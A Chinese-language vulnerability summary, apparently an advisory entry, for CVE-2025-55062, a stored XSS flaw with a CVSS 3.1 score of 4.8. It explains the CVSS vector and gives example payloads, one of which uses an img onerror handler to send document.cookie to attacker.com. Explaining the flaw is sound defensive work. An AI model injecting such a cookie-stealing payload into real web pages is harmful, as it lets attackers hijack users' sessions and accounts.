CVE-2025-55062CVE-2025-55062是一个发生在Web应用中的存储型跨站脚本(Stored XSS)漏洞,编号为CWE-79(Web页面生成期间输入未正确中和)。该漏洞的CVSS 3.1基础评分为4.8,属于中等严重程度。漏洞允许具有高权限的攻击者在Web页面中注入恶意JavaScript代码,当其他用户访问包含恶意脚本的页面时,攻击代码将在受害者浏览器中执行,可能导致会话劫持、敏感信息窃取或进一步的钓鱼攻击。由于该漏洞为存储型XSS,恶意脚本会持久保存在服务器端,影响所有访问该页面的用户。漏洞需要攻击者具有高权限(PR:H)且需要用户交互(UI:R)才能触发,攻击向量为网络(AV:N)。该漏洞由[email protected]于2025年12月29日披露。
该漏洞属于CWE-79类别的存储型跨站脚本漏洞。在Web应用程序中,当用户提交的内容(如评论、表单输入、用户资料等)被服务器存储后,未经适当过滤或转义就直接呈现在其他用户的浏览器中时,就会产生此类漏洞。攻击者利用高权限账号在输入字段中注入恶意JavaScript或HTML代码,如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>。由于该内容被存储在数据库中,所有访问相关页面的用户都会执行这段恶意代码。攻击者可借此窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或植入恶意重定向。CVSS向量显示攻击复杂度低(AC:L),但需要高权限(PR:H)和用户交互(UI:R),影响范围为改变范围(S:C),机密性和完整性影响均为低(C:L/I:L),无可用性影响(A:N)。